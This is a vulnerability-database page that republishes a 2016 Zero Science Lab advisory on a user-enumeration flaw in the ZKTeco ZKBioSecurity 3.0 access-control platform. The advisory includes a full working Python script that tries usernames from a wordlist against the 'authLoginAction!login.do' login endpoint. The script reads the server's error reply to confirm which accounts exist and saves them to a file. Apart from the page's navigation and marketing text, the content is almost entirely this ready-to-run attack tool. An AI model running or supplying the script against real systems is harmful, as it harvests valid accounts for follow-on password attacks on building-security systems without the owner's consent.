Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ZKTeco ZKBioSecurity 3.0 User Enumeration Weakness

🗓️ 31 Aug 2016 00:00:00Reported by Gjoko KrsticType 
zeroscience
 zeroscience🔗 www.zeroscience.mk👁 43 Views

ZKBioSecurity3.0 'authLoginAction!login.do' script enumerates valid usernames, exposing sensitive informatio

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2016-20030
15 Mar 202613:35
attackerkb
CNNVD		ZKTeco ZKBioSecurity 安全漏洞
16 Mar 202600:00
cnnvd
CVE		CVE-2016-20030
15 Mar 202613:35
cve
Cvelist		CVE-2016-20030 ZKTeco ZKBioSecurity 3.0 User Enumeration via authLoginAction
15 Mar 202613:35
cvelist
EUVD		EUVD-2016-10815
16 Mar 202615:30
euvd
NVD		CVE-2016-20030
16 Mar 202614:17
nvd
OpenVAS		ZKTeco ZKBioSecurity Multiple Vulnerabilities (Jul 2016)
6 Oct 201600:00
openvas
Positive Technologies		PT-2026-25728
15 Mar 202600:00
ptsecurity
Vulnrichment		CVE-2016-20030 ZKTeco ZKBioSecurity 3.0 User Enumeration via authLoginAction
15 Mar 202613:35
vulnrichment
<html><body><p>#!/usr/bin/env python
#
#
# ZKTeco ZKBioSecurity 3.0 User Enumeration Weakness
#
#
# Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
# Product web page: http://www.zkteco.com
# Affected version: 3.0.1.0_R_230
#                   Platform: 3.0.1.0_R_230
#                   Personnel: 1.0.1.0_R_1916
#                   Access: 6.0.1.0_R_1757
#                   Elevator: 2.0.1.0_R_777
#                   Visitor: 2.0.1.0_R_877
#                   Video:2.0.1.0_R_489
#                   Adms: 1.0.1.0_R_197
#
# Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
# platform developed by ZKTeco. It contains four integrated modules: access
# control, video linkage, elevator control and visitor management. With an
# optimized system architecture designed for high level biometric identification
# and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
# solution for a whole new user experience.
#
# Desc: The weakness is caused due to the 'authLoginAction!login.do' script
# enumerating the list of valid usernames when some characters are provided
# via the 'username' parameter.
#
# Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
#            Microsoft Windows 7 Professional SP1 (EN)
#            Apache-Coyote/1.1
#            Apache Tomcat/7.0.56
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2016-5366
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5366.php
#
#
# 18.07.2016
#
#

import cookielib
import argparse
import urllib2
import urllib
import json
import sys

from colorama import Fore, Back, Style, init

init()

print '\n-----------------------------------------------'
print 'User Enumeration Tool v0.2 for ZKBioSecurity'
print 'Copyleft (c) 2016, Zero Science Lab'
print 'by lqwrm'
print '-----------------------------------------------\n'
parser = argparse.ArgumentParser()
parser.add_argument('-t', help='target IP or hostname', action='store', dest='target')
parser.add_argument('-f', help='username wordlist', action='store', dest='file')

args = parser.parse_args()
if len(sys.argv) != 5:
	parser.print_help()
	sys.exit()

host = args.target
fn = args.file

try:
	users = open(args.file, 'r')
except(IOError):
	print '[!] Error opening \'' +fn+ '\' file.'
	sys.exit()
lines = users.read().splitlines()
print '[*] Loaded %d usernames for testing.\n' % len(open(fn).readlines())
users.close()
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
results = open('validusers.txt', 'w')
for line in lines:
	chk_usr = urllib.urlencode({'username'   : line,
								'password'   : 'noneed',
								'loginType'  : 'NORMAL',
								'un'         : '1470746177485_7049',
								'systemCode' : 'visLogin.jsp'
								})
	try:
		xhr = json.load(opener.open('http://'+host+'/authLoginAction!login.do', chk_usr))
	except:
		print '[!] Error connecting to http://'+host
		sys.exit()
	print '[+] Testing username: ' +Fore.GREEN+line+Fore.RESET
	for key, value in xhr.iteritems():
		fnrand = value
		break
	if fnrand == 'Username or password is error.':
		print '[!] Found ' +Style.BRIGHT+Fore.RED+line+Fore.RESET+Style.RESET_ALL+ ' as valid registered user.'
		results.write('%s\n' % line)
results.close()
print '\n[*] Enumeration completed!'
print '[*] Valid usernames successfully written to \'validusers.txt\' file.'
</p></body></html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Aug 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 49.3
CVSS 3.19.8
EPSS0.00563
SSVC
zkbiosecurity3.0user enumeration'authloginaction!login.do'sensitive informationvulnerability discoveryzkteco inc.web based security platform
43